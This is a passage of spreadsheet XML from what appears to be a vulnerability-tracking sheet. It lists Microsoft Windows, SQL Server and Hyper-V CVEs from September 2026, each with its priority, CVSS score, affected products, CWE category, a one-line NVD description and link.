          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L62" s="5" t="inlineStr"/>
      <c r="M62" s="5" t="inlineStr"/>
      <c r="N62" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O62" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P62" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q62" s="5" t="inlineStr"/>
      <c r="R62" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="S62" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Windows Work Folder Service allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T62" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71336</t>
        </is>
      </c>
    </row>
    <row r="63">
      <c r="A63" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B63" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C63" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73006</t>
        </is>
      </c>
      <c r="D63" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E63" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F63" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G63" s="5" t="inlineStr"/>
      <c r="H63" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I63" s="5" t="inlineStr"/>
      <c r="J63" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K6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63" s="5" t="inlineStr"/>
      <c r="M63" s="5" t="inlineStr"/>
      <c r="N63" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O63" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P63" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q63" s="5" t="inlineStr"/>
      <c r="R63" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="S63" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Microsoft Graphics Component allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T63" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73006</t>
        </is>
      </c>
    </row>
    <row r="64">
      <c r="A64" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B64" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C64" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73012</t>
        </is>
      </c>
      <c r="D64" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E64" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F64" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G64" s="5" t="inlineStr"/>
      <c r="H64" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I64" s="5" t="inlineStr"/>
      <c r="J64" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K6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4" s="5" t="inlineStr"/>
      <c r="M64" s="5" t="inlineStr"/>
      <c r="N64" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O64" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P64" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q64" s="5" t="inlineStr"/>
      <c r="R64" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S64" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Management Services allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T64" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73012</t>
        </is>
      </c>
    </row>
    <row r="65">
      <c r="A65" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B65" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C65" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73013</t>
        </is>
      </c>
      <c r="D65" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E65" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F65" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G65" s="5" t="inlineStr"/>
      <c r="H65" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I65" s="5" t="inlineStr"/>
      <c r="J65" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K6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5" s="5" t="inlineStr"/>
      <c r="M65" s="5" t="inlineStr"/>
      <c r="N65" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O65" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P65" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q65" s="5" t="inlineStr"/>
      <c r="R65" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S65" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Imaging Component allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T65" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73013</t>
        </is>
      </c>
    </row>
    <row r="66">
      <c r="A66" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B66" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C66" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73016</t>
        </is>
      </c>
      <c r="D66" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E66" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F66" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G66" s="5" t="inlineStr"/>
      <c r="H66" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I66" s="5" t="inlineStr"/>
      <c r="J66" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K6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6" s="5" t="inlineStr"/>
      <c r="M66" s="5" t="inlineStr"/>
      <c r="N66" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O66" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P66" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q66" s="5" t="inlineStr"/>
      <c r="R66" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S66" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Graphics Component allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T66" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73016</t>
        </is>
      </c>
    </row>
    <row r="67">
      <c r="A67" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B67" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C67" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73023</t>
        </is>
      </c>
      <c r="D67" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E67" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F67" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G67" s="5" t="inlineStr"/>
      <c r="H67" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I67" s="5" t="inlineStr"/>
      <c r="J67" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K6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67" s="5" t="inlineStr"/>
      <c r="M67" s="5" t="inlineStr"/>
      <c r="N67" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O67" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P67" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q67" s="5" t="inlineStr"/>
      <c r="R67" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S67" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Imaging Component allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T67" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73023</t>
        </is>
      </c>
    </row>
    <row r="68">
      <c r="A68" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B68" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C68" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73028</t>
        </is>
      </c>
      <c r="D68" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E68" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F68" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G68" s="5" t="inlineStr"/>
      <c r="H68" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I68" s="5" t="inlineStr"/>
      <c r="J68" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K68" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L68" s="5" t="inlineStr"/>
      <c r="M68" s="5" t="inlineStr"/>
      <c r="N68" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O68" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P68" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q68" s="5" t="inlineStr"/>
      <c r="R68" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="S68" s="5" t="inlineStr">
        <is>
          <t>Improper access control in SQL Server allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T68" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73028</t>
        </is>
      </c>
    </row>
    <row r="69">
      <c r="A69" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B69" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C69" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77480</t>
        </is>
      </c>
      <c r="D69" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E69" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F69" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G69" s="5" t="inlineStr"/>
      <c r="H69" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I69" s="5" t="inlineStr"/>
      <c r="J69" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K69" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L69" s="5" t="inlineStr"/>
      <c r="M69" s="5" t="inlineStr"/>
      <c r="N69" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O69" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P69" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q69" s="5" t="inlineStr"/>
      <c r="R69" s="5" t="inlineStr">
        <is>
          <t>CWE-1220</t>
        </is>
      </c>
      <c r="S69" s="5" t="inlineStr">
        <is>
          <t>Insufficient granularity of access control in SQL Server allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T69" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77480</t>
        </is>
      </c>
    </row>
    <row r="70">
      <c r="A70" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B70" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C70" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77481</t>
        </is>
      </c>
      <c r="D70" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E70" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F70" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G70" s="5" t="inlineStr"/>
      <c r="H70" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I70" s="5" t="inlineStr"/>
      <c r="J70" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K70" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L70" s="5" t="inlineStr"/>
      <c r="M70" s="5" t="inlineStr"/>
      <c r="N70" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O70" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P70" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q70" s="5" t="inlineStr"/>
      <c r="R70" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S70" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T70" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77481</t>
        </is>
      </c>
    </row>
    <row r="71">
      <c r="A71" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B71" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C71" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77482</t>
        </is>
      </c>
      <c r="D71" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E71" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F71" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G71" s="5" t="inlineStr"/>
      <c r="H71" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I71" s="5" t="inlineStr"/>
      <c r="J71" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K71" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019</t>
        </is>
      </c>
      <c r="L71" s="5" t="inlineStr"/>
      <c r="M71" s="5" t="inlineStr"/>
      <c r="N71" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O71" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P71" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q71" s="5" t="inlineStr"/>
      <c r="R71" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S71" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in SQL Server allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T71" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77482</t>
        </is>
      </c>
    </row>
    <row r="72">
      <c r="A72" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B72" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C72" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77483</t>
        </is>
      </c>
      <c r="D72" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E72" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F72" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G72" s="5" t="inlineStr"/>
      <c r="H72" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I72" s="5" t="inlineStr"/>
      <c r="J72" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K72" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L72" s="5" t="inlineStr"/>
      <c r="M72" s="5" t="inlineStr"/>
      <c r="N72" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O72" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P72" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q72" s="5" t="inlineStr"/>
      <c r="R72" s="5" t="inlineStr">
        <is>
          <t>CWE-1390</t>
        </is>
      </c>
      <c r="S72" s="5" t="inlineStr">
        <is>
          <t>Weak authentication in SQL Server allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T72" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77483</t>
        </is>
      </c>
    </row>
    <row r="73">
      <c r="A73" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B73" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C73" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77484</t>
        </is>
      </c>
      <c r="D73" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E73" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F73" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G73" s="5" t="inlineStr"/>
      <c r="H73" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="I73" s="5" t="inlineStr"/>
      <c r="J73" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K73" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L73" s="5" t="inlineStr"/>
      <c r="M73" s="5" t="inlineStr"/>
      <c r="N73" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O73" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P73" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q73" s="5" t="inlineStr"/>
      <c r="R73" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="S73" s="5" t="inlineStr">
        <is>
          <t>Deserialization of untrusted data in SQL Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T73" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77484</t>
        </is>
      </c>
    </row>
    <row r="74">
      <c r="A74" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B74" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C74" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77486</t>
        </is>
      </c>
      <c r="D74" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E74" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F74" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G74" s="5" t="inlineStr"/>
      <c r="H74" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I74" s="5" t="inlineStr"/>
      <c r="J74" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K74" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019</t>
        </is>
      </c>
      <c r="L74" s="5" t="inlineStr"/>
      <c r="M74" s="5" t="inlineStr"/>
      <c r="N74" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O74" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P74" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q74" s="5" t="inlineStr"/>
      <c r="R74" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-190</t>
        </is>
      </c>
      <c r="S74" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in SQL Server allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T74" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77486</t>
        </is>
      </c>
    </row>
    <row r="75">
      <c r="A75" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B75" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C75" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77487</t>
        </is>
      </c>
      <c r="D75" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E75" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F75" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G75" s="5" t="inlineStr"/>
      <c r="H75" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I75" s="5" t="inlineStr"/>
      <c r="J75" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K75" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L75" s="5" t="inlineStr"/>
      <c r="M75" s="5" t="inlineStr"/>
      <c r="N75" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O75" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P75" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q75" s="5" t="inlineStr"/>
      <c r="R75" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="S75" s="5" t="inlineStr">
        <is>
          <t>Improper access control in SQL Server allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T75" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77487</t>
        </is>
      </c>
    </row>
    <row r="76">
      <c r="A76" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B76" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C76" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77495</t>
        </is>
      </c>
      <c r="D76" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E76" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F76" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G76" s="5" t="inlineStr"/>
      <c r="H76" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I76" s="5" t="inlineStr"/>
      <c r="J76" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K7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6" s="5" t="inlineStr"/>
      <c r="M76" s="5" t="inlineStr"/>
      <c r="N76" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O76" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P76" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q76" s="5" t="inlineStr"/>
      <c r="R76" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S76" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Imaging Component allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T76" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77495</t>
        </is>
      </c>
    </row>
    <row r="77">
      <c r="A77" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B77" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C77" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78456</t>
        </is>
      </c>
      <c r="D77" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E77" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F77" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G77" s="5" t="inlineStr"/>
      <c r="H77" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I77" s="5" t="inlineStr"/>
      <c r="J77" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K77" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2022</t>
        </is>
      </c>
      <c r="L77" s="5" t="inlineStr"/>
      <c r="M77" s="5" t="inlineStr"/>
      <c r="N77" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O77" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P77" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q77" s="5" t="inlineStr"/>
      <c r="R77" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S77" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T77" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78456</t>
        </is>
      </c>
    </row>
    <row r="78">
      <c r="A78" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B78" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C78" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80083</t>
        </is>
      </c>
      <c r="D78" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E78" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F78" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G78" s="5" t="inlineStr"/>
      <c r="H78" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I78" s="5" t="inlineStr"/>
      <c r="J78" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K78" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L78" s="5" t="inlineStr"/>
      <c r="M78" s="5" t="inlineStr"/>
      <c r="N78" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O78" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P78" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q78" s="5" t="inlineStr"/>
      <c r="R78" s="5" t="inlineStr">
        <is>
          <t>CWE-822</t>
        </is>
      </c>
      <c r="S78" s="5" t="inlineStr">
        <is>
          <t>Untrusted pointer dereference in Windows Hyper-V allows an authorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="T78" s="6" t="inlineStr">
        <is>
